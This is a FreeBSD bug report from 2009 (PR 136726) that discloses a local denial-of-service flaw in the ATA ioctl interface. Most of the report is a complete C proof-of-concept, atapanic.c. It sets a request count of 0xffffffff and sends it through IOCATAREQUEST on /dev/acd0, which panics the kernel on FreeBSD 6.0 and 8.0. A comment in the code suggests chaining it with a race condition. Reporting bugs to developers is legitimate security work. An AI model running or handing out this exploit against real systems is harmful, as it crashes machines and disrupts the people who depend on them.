misc/136726: Ata device local denial of service exploit

[Vincenzo Barranco]

>Number:         136726
>Category:       misc
>Synopsis:       Ata device local denial of service exploit
>Confidential:   no
>Severity:       critical
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Jul 13 20:00:07 UTC 2009
>Closed-Date:
>Last-Modified:
>Originator:     Vincenzo Barranco
>Release:        6.0 8.0
>Organization:
>Environment:
>Description:
/* atapanic.c
 *
 * Vincenzo Barranco, 13 July 2009
 *
 * this panics the freebsd kernel by passing a large value to malloc(9) in one of
 * fbsd's ata ioctl's.  tested on freebsd 6.0 and 8.0.  you need read access to the
 * ata device in /dev to be able to open() the device.  chain with some race condition
 * bug?
 *
 * - shaun
 *
 */


#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>

struct ata_ioc_requestz {
    union {
	struct {
	    u_int8_t            command;
	    u_int8_t            feature;
	    u_int64_t           lba;
	    u_int16_t           count;
	} ata;
	struct {
	    char                ccb[16];
	} atapi;
    } u;

    caddr_t             data;
    int                 count;
    int                 flags;

    int                 timeout;
    int                 error;
};


#define IOCATAREQUEST           _IOWR('a', 100, struct ata_ioc_requestz)

int main() {

struct ata_ioc_requestz evil;
int fd;

evil.count = 0xffffffff;
fd = open("/dev/acd0", O_RDONLY);  /* /dev/acd0 is one of my ata devices */

ioctl(fd, IOCATAREQUEST, &evil);

/* should never reach here if kernel panics */
return 0;    
}


>How-To-Repeat:
Run the program on the top
>Fix:


>Release-Note:
>Audit-Trail:
>Unformatted: